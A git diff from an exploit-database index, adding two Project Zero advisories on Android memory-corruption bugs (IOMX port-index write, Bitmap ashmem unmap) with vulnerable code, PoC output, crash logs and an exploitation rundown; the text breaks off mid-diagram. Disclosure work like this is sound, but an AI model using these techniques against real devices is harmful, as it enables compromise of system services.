28411,platforms/php/webapps/28411.txt,"DieselScripts Job Site - Forgot.php Multiple Cross-Site Scripting Vulnerabilities",2006-08-21,night_warrior771,php,webapps,0
28412,platforms/php/webapps/28412.txt,"DieselScripts DieselPay - 'index.php' Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0
28413,platforms/php/webapps/28413.txt,"cPanel 10.x - dohtaccess.html dir Parameter Cross-Site Scripting",2006-08-21,preth00nker,php,webapps,0
@ -29652,7 +29659,7 @@ id,file,description,date,author,platform,type,port
28434,platforms/php/webapps/28434.txt,"BigACE 1.8.2 - 'download.cmd.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
28435,platforms/php/webapps/28435.txt,"BigACE 1.8.2 - 'admin.cmd.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
28436,platforms/php/webapps/28436.txt,"Alstrasoft Video Share Enterprise 4.x - MyajaxPHP.php Remote File Inclusion",2006-08-26,night_warrior771,php,webapps,0
28437,platforms/php/webapps/28437.txt,"Joomla! / Mambo Component 'com_comprofiler' 1.0 - 'class.php' Remote File Inclusion",2006-08-26,Matdhule,php,webapps,0
28437,platforms/php/webapps/28437.txt,"Joomla! / Mambo Component Comprofiler 1.0 - 'class.php' Remote File Inclusion",2006-08-26,Matdhule,php,webapps,0
28439,platforms/php/webapps/28439.txt,"HLstats 1.34 - hlstats.php Cross-Site Scripting",2006-08-29,kefka,php,webapps,0
28440,platforms/php/webapps/28440.txt,"ModuleBased CMS - Multiple Remote File Inclusion",2006-08-29,sCORPINo,php,webapps,0
28441,platforms/php/webapps/28441.txt,"IwebNegar 1.1 - comments.php SQL Injection",2006-08-30,Hessam-x,php,webapps,0
@ -31506,15 +31513,15 @@ id,file,description,date,author,platform,type,port
31202,platforms/php/webapps/31202.txt,"PlutoStatus Locator 1.0pre alpha - 'index.php' Local File Inclusion",2008-02-14,muuratsalo,php,webapps,0
31206,platforms/php/webapps/31206.txt,"Joomla! / Mambo Component 'com_smslist' - 'listid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31207,platforms/php/webapps/31207.txt,"Joomla! / Mambo Component 'com_activities' - 'id' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31208,platforms/php/webapps/31208.txt,"Joomla! / Mambo Component 'com_sg' - 'pid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31208,platforms/php/webapps/31208.txt,"Joomla! / Mambo Component com_sg - 'pid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31209,platforms/php/webapps/31209.txt,"Joomla! / Mambo Component faq - 'catid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31210,platforms/php/webapps/31210.txt,"Yellow Swordfish Simple Forum 1.10/1.11 - 'topic' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31211,platforms/php/webapps/31211.txt,"Yellow Swordfish Simple Forum 1.7/1.9 - 'index.php' SQL Injection",2008-02-15,S@BUN,php,webapps,0
31212,platforms/php/webapps/31212.txt,"Yellow Swordfish Simple Forum 1.x - 'topic' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31213,platforms/php/webapps/31213.txt,"Joomla! / Mambo Component 'com_salesrep' - 'rid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31213,platforms/php/webapps/31213.txt,"Joomla! / Mambo Component com_salesrep - 'rid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31214,platforms/php/webapps/31214.txt,"Joomla! / Mambo Component 'com_lexikon' - 'id' Parameter SQL Injection",2008-02-16,S@BUN,php,webapps,0
31215,platforms/php/webapps/31215.txt,"Joomla! / Mambo Component 'com_filebase' - 'filecatid' Parameter SQL Injection",2008-02-16,S@BUN,php,webapps,0
31216,platforms/php/webapps/31216.txt,"Joomla! / Mambo Component 'com_scheduling' - 'id' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31215,platforms/php/webapps/31215.txt,"Joomla! / Mambo Component Filebase - 'filecatid' Parameter SQL Injection",2008-02-16,S@BUN,php,webapps,0
31216,platforms/php/webapps/31216.txt,"Joomla! / Mambo Component com_scheduling - 'id' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31217,platforms/php/webapps/31217.txt,"BanPro Dms 1.0 - 'index.php' Local File Inclusion",2008-02-16,muuratsalo,php,webapps,0
32241,platforms/php/webapps/32241.txt,"PHP Realty - 'dpage.php' SQL Injection",2008-08-13,CraCkEr,php,webapps,0
32242,platforms/php/webapps/32242.txt,"PHP-Fusion 4.01 - 'readmore.php' SQL Injection",2008-08-13,Rake,php,webapps,0
@ -31524,7 +31531,7 @@ id,file,description,date,author,platform,type,port
32246,platforms/php/webapps/32246.txt,"Nortel Networks SRG V16 - admin_modules.php module Parameter Traversal Local File Inclusion",2008-08-13,CraCkEr,php,webapps,0
32247,platforms/php/webapps/32247.txt,"Nortel Networks SRG V16 - modules.php module Parameter Traversal Local File Inclusion",2008-08-13,CraCkEr,php,webapps,0
31221,platforms/windows/webapps/31221.txt,"Ability Mail Server 2013 - Cross-Site Request Forgery (via Persistent Cross-Site Scripting) (Password Reset)",2014-01-27,"David Um",windows,webapps,0
31224,platforms/php/webapps/31224.txt,"Joomla! / Mambo Component 'com_profile' - 'oid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
31224,platforms/php/webapps/31224.txt,"Joomla! / Mambo Component com_profile - 'oid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
31225,platforms/php/webapps/31225.html,"RunCMS 1.6.1 - 'admin.php' Cross-Site Scripting",2008-02-18,NBBN,php,webapps,0
31226,platforms/php/webapps/31226.txt,"Joomla! / Mambo Component 'com_detail' - 'id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0
31227,platforms/php/webapps/31227.txt,"Yellow Swordfish Simple Forum 1.x - 'sf-profile.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0
@ -31668,7 +31675,7 @@ id,file,description,date,author,platform,type,port
31445,platforms/jsp/webapps/31445.txt,"Elastic Path 4.1 - 'manager/getImportFileRedirect.jsp' file Parameter Traversal Arbitrary File Access",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0
31446,platforms/jsp/webapps/31446.txt,"Elastic Path 4.1 - 'manager/FileManager.jsp' dir Variable Traversal Arbitrary Directory Listing",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0
31447,platforms/php/webapps/31447.txt,"News-Template 0.5beta - 'print.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-20,ZoRLu,php,webapps,0
31448,platforms/php/webapps/31448.txt,"Joomla! / Mambo Component 'com_datsogallery' 1.3.1 - 'id' Parameter SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0
31448,platforms/php/webapps/31448.txt,"Joomla! / Mambo Component Datsogallery 1.3.1 - 'id' Parameter SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0
31449,platforms/php/webapps/31449.txt,"W-Agora 4.0 - add_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
31450,platforms/php/webapps/31450.txt,"W-Agora 4.0 - create_forum.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
31451,platforms/php/webapps/31451.txt,"W-Agora 4.0 - create_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
@ -32415,8 +32422,8 @@ id,file,description,date,author,platform,type,port
32620,platforms/ios/webapps/32620.txt,"Vanctech File Commander 1.1 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,ios,webapps,8080
32622,platforms/php/webapps/32622.txt,"WordPress Plugin Ajax Pagination 1.1 - Local File Inclusion",2014-03-31,"Glyn Wintle",php,webapps,80
32623,platforms/multiple/webapps/32623.txt,"EMC Cloud Tiering Appliance 10.0 - Unauthenticated XXE Arbitrary File Read (Metasploit)",2014-03-31,"Brandon Perry",multiple,webapps,0
32624,platforms/php/webapps/32624.txt,"PHP JOBWEBSITE PRO - siteadmin/forgot.php adname Parameter SQL Injection",2008-12-01,Pouya_Server,php,webapps,0
32625,platforms/php/webapps/32625.txt,"PHP JOBWEBSITE PRO - siteadmin/forgot.php Multiple Parameter Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0
32624,platforms/php/webapps/32624.txt,"PHP JOBWEBSITE PRO - 'adname' Parameter SQL Injection",2008-12-01,Pouya_Server,php,webapps,0
32625,platforms/php/webapps/32625.txt,"PHP JOBWEBSITE PRO - 'forgot.php' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0
32626,platforms/asp/webapps/32626.txt,"ASP Forum Script - messages.asp message_id Parameter SQL Injection",2008-12-01,Pouya_Server,asp,webapps,0
32627,platforms/php/webapps/32627.txt,"ASP Forum Script - new_message.asp forum_id Parameter Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0
32628,platforms/asp/webapps/32628.txt,"ASP Forum Script - messages.asp forum_id Parameter Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0
@ -32522,7 +32529,7 @@ id,file,description,date,author,platform,type,port
32803,platforms/php/webapps/32803.txt,"A4Desk Event Calendar - 'eventid' Parameter SQL Injection",2008-10-01,r45c4l,php,webapps,0
32804,platforms/php/webapps/32804.txt,"lastRSS autoposting bot MOD 0.1.3 - 'phpbb_root_path' Parameter Remote File Inclusion",2009-02-20,Kacper,php,webapps,0
32806,platforms/php/webapps/32806.txt,"Blue Utopia - 'index.php' Local File Inclusion",2009-02-22,PLATEN,php,webapps,0
32807,platforms/php/webapps/32807.txt,"Joomla! / Mambo Component 'com_gigcal' 1.0 - 'banddetails.php' SQL Injection",2009-02-23,"Salvatore Fresta",php,webapps,0
32807,platforms/php/webapps/32807.txt,"Joomla! / Mambo Component gigCalendar 1.0 - 'banddetails.php' SQL Injection",2009-02-23,"Salvatore Fresta",php,webapps,0
32808,platforms/php/webapps/32808.txt,"Magento 1.2 - app/code/core/Mage/Admin/Model/Session.php login['Username'] Parameter Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0
32809,platforms/php/webapps/32809.txt,"Magento 1.2 - app/code/core/Mage/Adminhtml/controllers/IndexController.php email Parameter Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0
32810,platforms/php/webapps/32810.txt,"Magento 1.2 - downloader/index.php URL Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0
@ -32838,7 +32845,7 @@ id,file,description,date,author,platform,type,port
33446,platforms/php/webapps/33446.txt,"Barbo91 - 'upload.php' Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0
33447,platforms/php/webapps/33447.php,"FreeWebShop 2.2.9 R2 - Multiple Remote Vulnerabilities",2009-12-29,"Akita Software Security",php,webapps,0
33448,platforms/php/webapps/33448.txt,"AzDGDatingMedium 1.9.3 - 'l' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-12-29,indoushka,php,webapps,0
33449,platforms/php/webapps/33449.txt,"Conkurent PHPMyCart 1.3 - Cross-Site Scripting / Authentication Bypass",2009-12-31,indoushka,php,webapps,0
33449,platforms/php/webapps/33449.txt,"PHPMyCart 1.3 - Cross-Site Scripting / Authentication Bypass",2009-12-31,indoushka,php,webapps,0
33450,platforms/php/webapps/33450.txt,"SendStudio 4.0.1 - Cross-Site Scripting / Security Bypass",2009-12-31,indoushka,php,webapps,0
33451,platforms/php/webapps/33451.txt,"BosClassifieds 1.20 - 'recent.php' Cross-Site Scripting",2009-12-31,indoushka,php,webapps,0
33452,platforms/php/webapps/33452.txt,"Imagevue r16 - 'amount' Parameter Cross-Site Scripting",2009-12-31,indoushka,php,webapps,0
@ -34225,7 +34232,7 @@ id,file,description,date,author,platform,type,port
35758,platforms/asp/webapps/35758.txt,"Mitel Audio and Web Conferencing 4.4.3.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-16,"Richard Brain",asp,webapps,0
35750,platforms/hardware/webapps/35750.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit DnsProxy.cmd",2015-01-11,"XLabs Security",hardware,webapps,0
35751,platforms/hardware/webapps/35751.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit Lancfg2get.cgi",2015-01-11,"XLabs Security",hardware,webapps,0
35752,platforms/php/webapps/35752.txt,"Mambo Component 'com_docman' 1.3.0 - Multiple SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0
35752,platforms/php/webapps/35752.txt,"Mambo Component Docman 1.3.0 - Multiple SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0
35754,platforms/php/webapps/35754.txt,"allocPSA 1.7.4 - 'login/login.php' Cross-Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0
35755,platforms/php/webapps/35755.txt,"DocMGR 1.1.2 - 'history.php' Cross-Site Scripting",2011-05-12,"AutoSec Tools",php,webapps,0
35756,platforms/php/webapps/35756.txt,"openQRM 4.8 - 'source_tab' Parameter Cross-Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0
@ -34428,16 +34435,16 @@ id,file,description,date,author,platform,type,port
36094,platforms/php/webapps/36094.txt,"TinyWebGallery 1.8.4 - Local File Inclusion / SQL Injection",2011-08-31,KedAns-Dz,php,webapps,0
36095,platforms/php/webapps/36095.txt,"S9Y Serendipity 1.5.1 - 'research_display.php' SQL Injection",2011-08-31,The_Exploited,php,webapps,0
36096,platforms/php/webapps/36096.txt,"Web Professional - 'default.php' SQL Injection",2011-08-31,The_Exploited,php,webapps,0
36097,platforms/php/webapps/36097.txt,"Mambo Component 'com_n-skyrslur' - Cross-Site Scripting",2011-09-02,CoBRa_21,php,webapps,0
36097,platforms/php/webapps/36097.txt,"Mambo Component N-Skyrslur - Cross-Site Scripting",2011-09-02,CoBRa_21,php,webapps,0
36098,platforms/php/webapps/36098.html,"Guppy CMS 5.0.9 / 5.00.10 - Authentication Bypass/Change Email",2015-02-17,"Brandon Murphy",php,webapps,80
36099,platforms/php/webapps/36099.html,"GuppY CMS 5.0.9 < 5.00.10 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-02-17,"Brandon Murphy",php,webapps,80
36102,platforms/php/webapps/36102.txt,"Mambo Component 'com_n-gallery' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
36102,platforms/php/webapps/36102.txt,"Mambo Component N-Gallery - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
36103,platforms/php/webapps/36103.txt,"Mambo Component Ahsshop - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
36105,platforms/hardware/webapps/36105.sh,"D-Link DSL-2640B - Unauthenticated Remote DNS Change",2015-02-18,"Todor Donev",hardware,webapps,0
36106,platforms/php/webapps/36106.txt,"Mambo Component 'com_n-press' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
36106,platforms/php/webapps/36106.txt,"Mambo Component N-Press - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
36107,platforms/php/webapps/36107.txt,"KaiBB 2.0.1 - SQL Injection / Arbitrary File Upload",2011-09-02,KedAns-Dz,php,webapps,0
36108,platforms/php/webapps/36108.txt,"Mambo Component 'com_n-frettir' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
36109,platforms/php/webapps/36109.txt,"Mambo Component 'com_n-myndir' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
36108,platforms/php/webapps/36108.txt,"Mambo Component N-Frettir - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
36109,platforms/php/webapps/36109.txt,"Mambo Component N-Myndir - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
36110,platforms/php/webapps/36110.txt,"ACal 2.2.6 - 'calendar.php' Cross-Site Scripting",2011-09-02,T0xic,php,webapps,0
36112,platforms/php/webapps/36112.txt,"Wordpress Plugin Duplicator 0.5.8 - Privilege Escalation",2015-02-18,"Kacper Szurek",php,webapps,80
36113,platforms/php/webapps/36113.txt,"Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting",2011-09-05,R3d-D3V!L,php,webapps,0
@ -35802,7 +35809,7 @@ id,file,description,date,author,platform,type,port
38304,platforms/php/webapps/38304.py,"SMF (Simple Machine Forum) 2.0.10 - Remote Memory Exfiltration Exploit",2015-09-24,"Filippo Roncari",php,webapps,0
38309,platforms/php/webapps/38309.txt,"osCommerce - Cross-Site Request Forgery",2013-02-12,"Jakub Galczyk",php,webapps,0
38311,platforms/php/webapps/38311.txt,"BlackNova Traders - 'news.php' SQL Injection",2013-02-12,ITTIHACK,php,webapps,0
38312,platforms/php/webapps/38312.txt,"AbanteCart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2013-02-14,LiquidWorm,php,webapps,0
40882,platforms/php/webapps/40882.txt,"Edge SkateShop - Authentication bypass",2016-12-06,Delilah,php,webapps,0
38314,platforms/php/webapps/38314.txt,"WordPress Plugin NextGEN Gallery - Full Path Disclosure",2013-02-14,"Henrique Montenegro",php,webapps,0
38315,platforms/php/webapps/38315.txt,"Sonar - Multiple Cross-Site Scripting Vulnerabilities",2013-02-12,DevilTeam,php,webapps,0
38316,platforms/cgi/webapps/38316.txt,"FortiManager 5.2.2 - Persistent Cross-Site Scripting",2015-09-25,hyp3rlinx,cgi,webapps,0
@ -36850,3 +36857,4 @@ id,file,description,date,author,platform,type,port
40852,platforms/php/webapps/40852.txt,"Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection",2016-09-16,"Larry W. Cashdollar",php,webapps,0
40853,platforms/hardware/webapps/40853.txt,"Xfinity Gateway - Cross-Site Request Forgery",2016-11-30,Pabstersac,hardware,webapps,0
40856,platforms/hardware/webapps/40856.txt,"Xfinity Gateway - Remote Code Execution",2016-12-02,"Gregory Smiley",hardware,webapps,0
40877,platforms/php/webapps/40877.txt,"AbanteCart 1.2.7 - Cross-Site Scripting",2016-12-06,"Kacper Szurek",php,webapps,0

Can't render this file because it is too large.

169
platforms/android/dos/40876.txt Executable file
View file

@ -0,0 +1,169 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=932
The code in IOMXNodeInstance.cpp that handles enableNativeBuffers uses port_index without validation, leading to writing the dword value 0 or 1 at an attacker controlled offset from the IOMXNodeInstance structure.
The vulnerable code is here (every write to mSecureBufferType):
status_t OMXNodeInstance::enableNativeBuffers(
OMX_U32 portIndex, OMX_BOOL graphic, OMX_BOOL enable) {
Mutex::Autolock autoLock(mLock);
CLOG_CONFIG(enableNativeBuffers, "%s:%u%s, %d", portString(portIndex), portIndex,
graphic ? ", graphic" : "", enable);
OMX_STRING name = const_cast<OMX_STRING>(
graphic ? "OMX.google.android.index.enableAndroidNativeBuffers"
: "OMX.google.android.index.allocateNativeHandle");
OMX_INDEXTYPE index;
OMX_ERRORTYPE err = OMX_GetExtensionIndex(mHandle, name, &index);
if (err == OMX_ErrorNone) {
EnableAndroidNativeBuffersParams params;
InitOMXParams(&params);
params.nPortIndex = portIndex;
params.enable = enable;
err = OMX_SetParameter(mHandle, index, &params);
CLOG_IF_ERROR(setParameter, err, "%s(%#x): %s:%u en=%d", name, index,
portString(portIndex), portIndex, enable);
if (!graphic) {
if (err == OMX_ErrorNone) {
mSecureBufferType[portIndex] =
enable ? kSecureBufferTypeNativeHandle : kSecureBufferTypeOpaque;
} else if (mSecureBufferType[portIndex] == kSecureBufferTypeUnknown) {
mSecureBufferType[portIndex] = kSecureBufferTypeOpaque;
}
}
} else {
CLOG_ERROR_IF(enable, getExtensionIndex, err, "%s", name);
if (!graphic) {
// Extension not supported, check for manual override with system property
// This is a temporary workaround until partners support the OMX extension
char value[PROPERTY_VALUE_MAX];
if (property_get("media.mediadrmservice.enable", value, NULL)
&& (!strcmp("1", value) || !strcasecmp("true", value))) {
CLOG_CONFIG(enableNativeBuffers, "system property override: using native-handles");
mSecureBufferType[portIndex] = kSecureBufferTypeNativeHandle;
} else if (mSecureBufferType[portIndex] == kSecureBufferTypeUnknown) {
mSecureBufferType[portIndex] = kSecureBufferTypeOpaque;
}
err = OMX_ErrorNone;
}
}
return StatusFromOMXError(err);
}
This code is reached from the binder interface android.hardware.IOMX in the mediaserver process; via the following code in IOMX.cpp which reads the port_index directly from the incoming parcel without any validation.
case ENABLE_NATIVE_BUFFERS:
{
CHECK_OMX_INTERFACE(IOMX, data, reply);
node_id node = (node_id)data.readInt32();
OMX_U32 port_index = data.readInt32();
OMX_BOOL graphic = (OMX_BOOL)data.readInt32();
OMX_BOOL enable = (OMX_BOOL)data.readInt32();
status_t err = enableNativeBuffers(node, port_index, graphic, enable);
reply->writeInt32(err);
return NO_ERROR;
}
Running the attached proof-of-concept on a Nexus 5x yields the following output:
--- binder OMX index-out-of-bounds ---
[0] opening /dev/binder
[0] looking up media.player
0000: 00 . 01 . 00 . 00 . 1a . 00 . 00 . 00 . 61 a 00 . 6e n 00 . 64 d 00 . 72 r 00 .
0016: 6f o 00 . 69 i 00 . 64 d 00 . 2e . 00 . 6f o 00 . 73 s 00 . 2e . 00 . 49 I 00 .
0032: 53 S 00 . 65 e 00 . 72 r 00 . 76 v 00 . 69 i 00 . 63 c 00 . 65 e 00 . 4d M 00 .
0048: 61 a 00 . 6e n 00 . 61 a 00 . 67 g 00 . 65 e 00 . 72 r 00 . 00 . 00 . 00 . 00 .
0064: 0c . 00 . 00 . 00 . 6d m 00 . 65 e 00 . 64 d 00 . 69 i 00 . 61 a 00 . 2e . 00 .
0080: 70 p 00 . 6c l 00 . 61 a 00 . 79 y 00 . 65 e 00 . 72 r 00 . 00 . 00 . 00 . 00 .
BR_NOOP:
BR_TRANSACTION_COMPLETE:
BR_REPLY:
target 0000000000000000 cookie 0000000000000000 code 00000000 flags 00000000
pid 0 uid 1000 data 24 offs 8
0000: 85 . 2a * 68 h 73 s 7f . 01 . 00 . 00 . 01 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
0016: 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
- type 73682a85 flags 0000017f ptr 0000000000000001 cookie 0000000000000000
[0] got handle 00000001
[0] creating an OMX
0000: 00 . 01 . 00 . 00 . 21 ! 00 . 00 . 00 . 61 a 00 . 6e n 00 . 64 d 00 . 72 r 00 .
0016: 6f o 00 . 69 i 00 . 64 d 00 . 2e . 00 . 6d m 00 . 65 e 00 . 64 d 00 . 69 i 00 .
0032: 61 a 00 . 2e . 00 . 49 I 00 . 4d M 00 . 65 e 00 . 64 d 00 . 69 i 00 . 61 a 00 .
0048: 50 P 00 . 6c l 00 . 61 a 00 . 79 y 00 . 65 e 00 . 72 r 00 . 53 S 00 . 65 e 00 .
0064: 72 r 00 . 76 v 00 . 69 i 00 . 63 c 00 . 65 e 00 . 00 . 00 .
BR_NOOP:
BR_TRANSACTION_COMPLETE:
BR_REPLY:
target 0000000000000000 cookie 0000000000000000 code 00000000 flags 00000000
pid 0 uid 1013 data 24 offs 8
0000: 85 . 2a * 68 h 73 s 7f . 01 . 00 . 00 . 02 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
0016: 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
- type 73682a85 flags 0000017f ptr 0000000000000002 cookie 0000000000000000
[0] got handle 00000002
[0] creating node
0000: 00 . 01 . 00 . 00 . 15 . 00 . 00 . 00 . 61 a 00 . 6e n 00 . 64 d 00 . 72 r 00 .
0016: 6f o 00 . 69 i 00 . 64 d 00 . 2e . 00 . 68 h 00 . 61 a 00 . 72 r 00 . 64 d 00 .
0032: 77 w 00 . 61 a 00 . 72 r 00 . 65 e 00 . 2e . 00 . 49 I 00 . 4f O 00 . 4d M 00 .
0048: 58 X 00 . 00 . 00 . 4f O 4d M 58 X 2e . 67 g 6f o 6f o 67 g 6c l 65 e 2e . 67 g
0064: 73 s 6d m 2e . 64 d 65 e 63 c 6f o 64 d 65 e 72 r 00 . 00 . 85 . 2a * 62 b 73 s
0080: 7f . 01 . 00 . 00 . 41 A 41 A 41 A 41 A 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
0096: 00 . 00 . 00 . 00 .
BR_NOOP:
BR_INCREFS:
0x7fe5862df8, 0x7fe5862e00
BR_ACQUIRE:
0x7fe5862e0c, 0x7fe5862e14
BR_TRANSACTION_COMPLETE:
BR_NOOP:
BR_REPLY:
target 0000000000000000 cookie 0000000000000000 code 00000000 flags 00000000
pid 0 uid 1013 data 8 offs 0
0000: 00 . 00 . 00 . 00 . 03 . 00 . 1e . 1d .
[0] got node 1d1e0003
[0] triggering bug
0000: 00 . 01 . 00 . 00 . 15 . 00 . 00 . 00 . 61 a 00 . 6e n 00 . 64 d 00 . 72 r 00 .
0016: 6f o 00 . 69 i 00 . 64 d 00 . 2e . 00 . 68 h 00 . 61 a 00 . 72 r 00 . 64 d 00 .
0032: 77 w 00 . 61 a 00 . 72 r 00 . 65 e 00 . 2e . 00 . 49 I 00 . 4f O 00 . 4d M 00 .
0048: 58 X 00 . 00 . 00 . 03 . 00 . 1e . 1d . ba . 43 C 46 F 60 ` 00 . 00 . 00 . 00 .
0064: 00 . 00 . 00 . 00 .
BR_NOOP:
BR_TRANSACTION_COMPLETE:
BR_NOOP:
BR_DEAD_REPLY:
And a corresponding crash in the mediaserver process:
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint: 'google/bullhead/bullhead:7.0/NRD91E/3234993:userdebug/dev-keys'
Revision: 'rev_1.0'
ABI: 'arm'
pid: 7454, tid: 7457, name: Binder:7454_1 >>> /system/bin/mediaserver <<<
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x6a9e0014
r0 6a9dffa8 r1 ea8e757c r2 ea43aa1a r3 0000000f
r4 e984f0c0 r5 8000101a r6 00000000 r7 ea43a981
r8 604643ba r9 00000000 sl ea451f61 fp 00000000
ip ea012658 sp e81d5660 lr e9faa527 pc ea42d834 cpsr 60030030
backtrace:
#00 pc 0001c834 /system/lib/libstagefright_omx.so (_ZN7android15OMXNodeInstance19enableNativeBuffersEj8OMX_BOOLS1_+131)
#01 pc 0009b8fb /system/lib/libmedia.so (_ZN7android5BnOMX10onTransactEjRKNS_6ParcelEPS1_j+3626)
#02 pc 000359c3 /system/lib/libbinder.so (_ZN7android7BBinder8transactEjRKNS_6ParcelEPS1_j+70)
#03 pc 0003d1bb /system/lib/libbinder.so (_ZN7android14IPCThreadState14executeCommandEi+702)
#04 pc 0003ce07 /system/lib/libbinder.so (_ZN7android14IPCThreadState20getAndExecuteCommandEv+114)
#05 pc 0003d31b /system/lib/libbinder.so (_ZN7android14IPCThreadState14joinThreadPoolEb+46)
#06 pc 0004f765 /system/lib/libbinder.so
#07 pc 0000e349 /system/lib/libutils.so (_ZN7android6Thread11_threadLoopEPv+140)
#08 pc 00047003 /system/lib/libc.so (_ZL15__pthread_startPv+22)
#09 pc 00019e1d /system/lib/libc.so (__start_thread+6)
Fixed in the November security bulletin at https://source.android.com/security/bulletin/2016-11-01.html
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40876.zip

91
platforms/android/remote/40874.txt Executable file
View file

@ -0,0 +1,91 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=928
Bitmap objects can be passed between processes by flattening them to a Parcel in one process and un-flattening them in another. In order to conserve memory, there exists a code path which allows Bitmaps to be shared between processes by providing an ashmem-mapped file descriptor containing the Bitmap's raw pixel data.
The android.graphics.Bitmap class illegally assumes that the size of the ashmem region provided by the user matches the actual underlying size of the Bitmap.
When un-flattening a Bitmap from a Parcel, the class first calculates the assumed size of the Bitmap from the user-provided dimensions. Then, it calls Parcel::readBlob in order to map the given ashmem file descriptor to the process's VAS. This mapping is done using the size calculated from the Bitmap's dimensions (and not the size of the underlying ashmem descriptor).
Later, the Bitmap constructor internally stores the ashmem file descriptor and mapped memory address, along with the size of the mapping. However, instead of using the same calculated size which was used when mapping the shared memory region, it accidentally queries the ashmem region for its real size, like so:
mPixelStorage.ashmem.size = ashmem_get_size_region(fd);
This size can be completely controlled by an attacker (simply by calling ASHMEM_SET_SIZE), and may be arbitrary large.
Later, when the Bitmap is GC-ed, the destructor triggers a call to Bitmap::doFreePixels which unmaps the Bitmap's data, by calling:
munmap(mPixelStorage.ashmem.address, mPixelStorage.ashmem.size);
This means that an attacker can cause the size of the unmapped region to be arbitrarily large, thus unmapping crucial regions in the remote process's VAS.
One example of how this can be exploited is by unmapping the remote process's heap (which is directly after the mmap-ed ranges on the device I was working on). Then, the attacker can resend a large Bitmap which will be mapped over the (previously unmapped) heap, thus allowing the attacker to effectively replace the remote process's heap with controlled data.
I've attached a short PoC which crashes system_server by repeatedly unmaps large memory regions.
Suggested Fix:
Store the calculated size in mPixelStorage.ashmem.size instead of calling ashmem_get_size_region.
Here's a brief run-down of the exploit:
1. The exploit begins by calling AudioService.unloadSoundEffects in order to close the SoundPool instance in system_server. This also closes any auxiliary threads (SoundPool, SoundPoolThread, etc.) that are associated with this pool.
2. Now, we start "massaging" system_server's VAS. This is done by creating multiple "Notification" objects which contain Bitmaps that are of exactly the same size at a thread's stack, when created by the ART runtime. As the bitmaps are allocated by using "mmap", they will simply inhabit the highest memory address between mm->mmap_base and TASK_SIZE which contains a sufficiently large contiguous hole. Causing many allocations of the aforementioned size will ensure that any "holes" of this size in higher addresses are filled, and the remaining "mmap"-s of this size will be contiguous.
3. Now that we are certain allocations of size THREAD_SIZE are contiguous, we replace one of notifications created in the previous stage with a notification containing a small (or empty) bitmap, and immediately send multiple dummy transactions to system_server in order to force garbage collection of the freed bitmap object. This will enable us to open up a "hole" in the contiguous allocations, like so:
<--low high-->
----------------------------------------------------------------
| Bitmap | Bitmap | Bitmap | Bitmap | Bitmap | Bitmap | Bitmap |
----------------------------------------------------------------
||
\/
<--low high-->
----------------------------------------------------------------
